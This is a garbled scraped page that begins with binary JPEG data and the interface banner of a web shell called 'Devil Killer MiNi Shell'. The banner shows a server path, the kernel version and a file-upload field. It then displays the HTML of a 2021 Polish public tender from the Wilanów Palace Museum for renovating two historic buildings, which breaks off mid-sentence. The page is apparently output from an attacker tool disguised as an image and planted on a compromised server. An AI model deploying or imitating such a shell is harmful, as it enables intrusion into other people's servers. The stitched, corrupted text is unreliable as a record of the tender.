JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210524/0006278302-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00062783 z dnia 2021-05-24</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych polegających na remoncie budynków Domku Lanciego i Drwalni Peldy w Muzeum Pałacu Króla Jana III w Wilanowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Pałacu Króla Jana III w Wilanowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010956038</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisława Kostki Potockiego 10/16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-958</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ezaborska@muzeum-wilanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wilanow-palac.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych polegających na remoncie budynków Domku Lanciego i Drwalni Peldy w Muzeum Pałacu Króla Jana III w Wilanowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6893d608-bc95-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00062783</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007610/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Roboty budowlane (Remont Domku Lanciego i Drwalni Peldy)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://muzeum-wilanow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://muzeumwilanow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca składający ofertę w formie elektronicznej, musi posiadać konto na w/w platformie,<br/>wówczas ma dostęp do formularzy: złożenia, zmiany, wycofania oferty.Dokumenty i oświadczenia, o<br/>których mowa w Rozdziale VII SWZ należy złożyć w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. zgodnie z art. 63 ust. 2 ustawy Pzp i § 15<br/>Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dn. 23.12.2020 r. (Dz.U. poz.<br/>2415).Zamawiający rekomenduje podpisywanie plików w formacie pdf formatem PAdES. Dopuszcza<br/>się podpisanie dokumentów w formacie innym niż „pdf", wtedy będzie wymagany oddzielny plik z<br/>podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego<br/>dokumentu, oddzielny plik z podpisem.Oferta powinna być sporządzona w języku polskim, z<br/>zachowaniem postaci elektronicznej w formacie danych .doc, .docx, .xls, .xlsx, .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z treścią zawarta w formularzu oferty stanowiącej<br/>załącznik nr 2 do SWZ wykonawca składa oświadczenie: Oświadczam, że wypełniłem obowiązki<br/>informacyjne przewidziane w art. 13 lub art. 14 RODO***** wobec osób fizycznych, od których dane<br/>osobowe bezpośrednio lub pośrednio pozyskałem w celu ubiegania się o udzielenie zamówienia<br/>publicznego w niniejszym postępowaniu.*********** Rozporządzenie Parlamentu Europejskiego i Rady<br/>(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>Ogłoszenie nr 2021/BZP 00009093 z dnia 2021-02-19<br/>2021-02-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str.<br/>1). ****** W przypadku gdy wykonawca nie przekazuje danych osobowych innych niż bezpośrednio<br/>jego dotyczących lub zachodzi wyłączenie stosowania obowiązku informacyjnego, stosownie do art. 13<br/>ust. 4 lub art. 14 ust. 5 RODO treści oświadczenia wykonawca nie składa (usunięcie treści<br/>oświadczenia np. przez jego wykreślenie).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DEF.ZP.2401.4.AZ.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 3524623,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia są roboty budowlane i prace konserwatorskie polegające na wykonaniu robót budowlanych polegających na remoncie budynków Domku Lanciego i Drwalni Peldy w Muzeum Pałacu Króla Jana III w Wilanowie na działce nr ew. 24/4 z obrębu 1-05-52 przy ul. Przyczółkowej 394 w Dzielnicy Wilanów m. st. Warszawy.<br/>2)	Opis przedmiotu zamówienia zawiera załącznik nr 1 do SWZ.<br/>3)	Przedmiot zamówienia będzie realizowany zgodnie ze wzorem umowy, stanowiącym załącznik nr 6 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45261900-3 - Naprawa i konserwacja dachów</p> <p class="mb-0">45261910-6 - Naprawa dachów</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45262600-7 - Różne specjalne roboty budowlane</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert.<br/>1.	Liczba punktów przyznawana dla oferty, w kryterium „CENA-C” (C): <br/>1.1.	Sposób obliczenia CENA-C:<br/> cena (brutto) najniższa<br/>	C = -------------------------------------------- x 60<br/> cena (brutto) badanej oferty<br/>1.2.	Zamawiający oceni ofertę Wykonawcy w kryterium „CENA-C” na podstawie Formularza oferty (załącznik nr 2 do SWZ) <br/>2.	Liczba punktów przyznanych dla oferty w kryterium: „Przygotowanie projektu koncepcyjnego osłony malowidła Starowieyskiego „K”<br/>Przygotowanie projektu koncepcyjnego osłony malowidła Starowieyskiego<br/>Brak projektu koncepcyjnego osłony malowidła Starowieyskiego lub projekt koncepcyjny zawierający minimalne wymagania wskazane w SWZ i załącznikach do SWZ	0 pkt<br/>Projekt koncepcyjny osłony malowidła Starowieyskiego zawierający rozwiązania techniczne lub skuteczną propozycję dodatkowych działań wykraczających poza określone przez Zamawiającego w SWZ i załącznikach do SWZ wraz z uzasadnieniem wpływu na bezpieczeństwo malowidła, sposób eksponowania oraz możliwość przeprowadzania prac restauratorskich malowidła oraz praktyczne sposoby bieżącego użytkowania i konserwacji osłony. 20 pkt<br/>2.1.	Zamawiający będzie brał pod uwagę przy ocenie projektu koncepcyjnego :<br/>1)	Adekwatność, zgodność zaoferowanych rozwiązań technicznych projektu koncepcyjnego w odniesieniu do przedmiotu zamówienia.<br/>2)	Adekwatność, zgodność, skuteczność zaoferowanych rozwiązań technicznych/ projektu koncepcyjnego w odniesieniu do wymagań, które zaoferowane rozwiązania techniczne/ projekt koncepcyjny mają wspomagać pod kątem zabezpieczenia malowidła, sposobu eksponowania malowidła,<br/>3)	Adekwatność, zgodność zaoferowanych rozwiązań technicznych/ projektu koncepcyjnego w odniesieniu do wymagań, które zaoferowane rozwiązania techniczne/propozycje mają wspomagać pod kątem korzyści użytkowych oraz stopnia skomplikowania – (łatwość zastosowania). <br/>Spełnienie wszystkich trzech punktów powyżej łącznie skutkować będzie przyznaniem punktów za kryterium (20). <br/>2.4.	Podstawa oceny kryterium „K” będą wytyczne opisane w ust. 2 pkt. 2.4. część A2 lit. r) niniejszego SWZ.<br/>3.	Liczba punktów przyznawana dla oferty, w kryterium Doświadczenie personelu kluczowego – Doświadczenie Kierownika Budowy „DOŚWIADCZENIE-D” (D):<br/>3.1.	Sposób obliczenia D:<br/>Doświadczenie osoby (spełniającej wymagania zawarte w Rozdziale VII pkt. 1.4. ppkt. 1.4.2 pkt. 1) a)-e) SWZ) w pełnieniu funkcji kierownika budowy u Wykonawcy podczas realizacji jednego zadania (umowy) o wartości nie mniejszej niż 4 000 000,00 zł brutto, w ramach którego występowały roboty budowlane, w tym prace konserwatorskie, w budynku wpisanym do rejestru zabytków** lub ewidencji zabytków*** lub inwentarza muzealium****, polegające łącznie co najmniej na: remoncie i/lub przebudowie i/lub rozbudowie i montażu instalacji;	0 pkt<br/>Doświadczenie osoby (spełniającej wymagania zawarte w Rozdziale VII pkt. 1.4. ppkt. 1.4.2 pkt. 1) a)-e) SWZ)) w pełnieniu funkcji kierownika budowy u Wykonawcy podczas realizacji dwóch zadań (umów), każde o wartości nie mniejszej niż 4 000 000,00 zł brutto, w ramach którego występowały roboty budowlane, w tym prace konserwatorskie, w budynku wpisanym do rejestru zabytków** lub ewidencji zabytków*** lub inwentarza muzealium****, polegające łącznie co najmniej na: remoncie i/lub przebudowie i/lub rozbudowie i montażu instalacji;	10,00 pkt <br/>Doświadczenie osoby (spełniającej wymagania zawarte w Rozdziale VII pkt. 1.4. ppkt. 1.4.2 pkt. 1) a)-e) SWZ)) w pełnieniu funkcji kierownika budowy u Wykonawcy podczas realizacji trzech zadań (umów), każde o wartości nie mniejszej niż 4 000 000,00 zł brutto, w ramach którego występowały roboty budowlane, w tym prace konserwatorskie, w budynku wpisanym do rejestru zabytków** lub ewidencji zabytków*** lub inwentarza muzealium****, , polegające łącznie co najmniej na: remoncie i/lub przebudowie i/lub rozbudowie i montażu instalacji;	20,00 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przygotowanie projektu koncepcyjnego osłony malowidła Starowieyskiego „K”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie personelu kluczowego – Doświadczenie Kierownika Budowy „D”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.3.	sytuacji ekonomicznej lub finansowej: warunek zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w okresie nie wcześniejszym niż 3 miesiące przed upływem terminu składania ofert – w wysokości nie mniejszej niż 4.000.000,00 zł*;<br/>*Jako kurs przeliczeniowy na PLN danych finansowych wyrażonych w walutach innych niż PLN, należy przyjąć średni kurs NBP (Tabela A) na dzień zamieszczenia ogłoszenia o zamówieniu dotyczącego przedmiotowego postępowania w Biuletynie Zamówień Publicznych.<br/><br/>W przypadku składania wspólnej oferty warunek określony w pkt. 1.3 uznaje się za spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia go spełnia.<br/><br/>1.4.	zdolności technicznej lub zawodowej: warunek zostanie spełniony, jeśli Wykonawca:<br/>1.4.1. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie zrealizował należycie co najmniej jedno zamówienie (umowę) wykonania robót budowlanych w charakterze generalnego wykonawcy robót budowlanych przy remoncie i/lub przebudowie i/lub nadbudowie obiektu/ów budowlanego/ych wpisanego/ych do rejestru zabytków**, w ramach którego wykonane zostały łącznie, co najmniej roboty: budowlane, instalacyjne, wykończeniowe oraz dostawa wyposażenia, o wartości co najmniej 4 000 000,00* zł brutto. Przez jedno zamówienie (umowę) wykonania robót budowlanych - należy rozumieć roboty budowlane świadczone na rzecz jednego Zleceniodawcy/Zamawiającego (przez jednego Zleceniodawcę Zamawiający rozumie osobę fizyczną, osobę prawną, a także inne podmioty). Zamawiający nie dopuszcza łączenia w celu spełnienia powyższego warunku robót budowlanych świadczonych na rzecz kilku różnych Zleceniodawców/Zamawiających lub kilku różnych obiektów budowlanych.<br/><br/>* Wartości podane w dokumentach potwierdzających spełnianie warunku udziału w postępowaniu w walutach innych niż PLN Wykonawca, a także Zamawiający przeliczy według średniego kursu NBP na dzień zamieszczenia ogłoszenia o zamówieniu dotyczącego przedmiotowego postępowania w Biuletynie Zamówień Publicznych. <br/>**Zgodnie z art. 7 – 9 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (tj. Dz. U. z 2021 r. poz. 710)<br/>1.4.2. wykaże, iż do realizacji przedmiotu zamówienia skieruje: <br/><br/>1) na stanowisko Kierownika budowy – jedną osobę, która:<br/>a)	posiada stosowne uprawnienia i kwalifikacje budowlane* do pełnienia samodzielnej funkcji technicznej w budownictwie tj. uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333, 2127, 2320, z 2021 r. poz. 11, 234, 282) oraz Rozporządzeniem w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie z dnia 29 kwietnia 2019 (t.j. Dz.U. 2019 poz. 831) lub posiadająca odpowiadające uprawnienia budowlane, wydane w oparciu o wcześniej obowiązujące przepisy prawa,<br/>b)	posiada co najmniej 60 miesięcy doświadczenia zawodowego, nabytego po uzyskaniu uprawnień budowlanych do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333, 2127, 2320, z 2021 r. poz. 11, 234, 282) oraz Rozporządzeniu w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie z dnia 29 kwietnia 2019 (t.j. Dz.U. 2019 poz. 831) lub posiadająca odpowiadające uprawnienia budowlane, wydane w oparciu o wcześniej obowiązujące przepisy prawa), w tym co najmniej 24 miesiące doświadczenia zawodowego w pełnieniu funkcji kierownika budowy nad robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, prowadzonymi przy zabytkach nieruchomych wpisanych do rejestru zabytków** lub ewidencji zabytków*** lub inwentarza muzealium****,<br/>c)	posiada doświadczenie w pełnieniu funkcji kierownika budowy podczas realizacji co najmniej jednego zadania u Wykonawcy, w ramach którego występowały roboty budowlane o wartości nie mniejszej niż 4 000 000,00 zł brutto, w tym prace konserwatorskie, w budynku wpisanym do rejestru zabytków** lub ewidencji zabytków*** lub inwentarza muzealium****, polegające łącznie co najmniej na: remoncie i/lub przebudowie i/lub rozbudowie i montażu instalacji i dostawie wyposażenia;<br/>d)	spełnia wymagania, o których mowa w art. 37c ustawy z 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2021 r. poz. 710), t.j. posiada uprawnienia budowlane określone przepisami Prawa budowlanego* oraz przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru** zabytków lub ewidencji zabytków*** lub inwentarza muzealium****;<br/>e)	przynależy do właściwej izby samorządu zawodowego (legitymuje się aktualnym zaświadczeniem o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa) i posiada aktualne wymagane ubezpieczenie od odpowiedzialności cywilnej.<br/><br/>2) na stanowisko Koordynatora prac wyposażeniowych - jedną osobę, która:<br/>a)	posiada stosowne uprawnienia i kwalifikacje budowlane* w specjalności architektonicznej do projektowania bez ograniczeń, określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333, 2127, 2320, z 2021 r. poz. 11, 234, 282) oraz Rozporządzeniem w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie z dnia 29 kwietnia 2019 (t.j. Dz.U. 2019 poz. 831) lub posiadającą odpowiadające uprawnienia budowlane, wydane w oparciu o wcześniej obowiązujące przepisy prawa;<br/>b)	posiada co najmniej 60 miesięcy doświadczenia zawodowego, nabytego po uzyskaniu uprawnień i kwalifikacji budowlanych* w specjalności architektonicznej do projektowania bez ograniczeń, określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333, 2127, 2320, z 2021 r. poz. 11, 234, 282) oraz Rozporządzeniu w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie z dnia 29 kwietnia 2019 (t.j. Dz.U. 2019 poz. 831) lub posiadająca odpowiadające uprawnienia budowlane, wydane w oparciu o wcześniej obowiązujące przepisy prawa, w tym co najmniej 24 miesiące doświadczenia zawodowego w pełnieniu funkcji koordynatora prac wyposażeniowych w 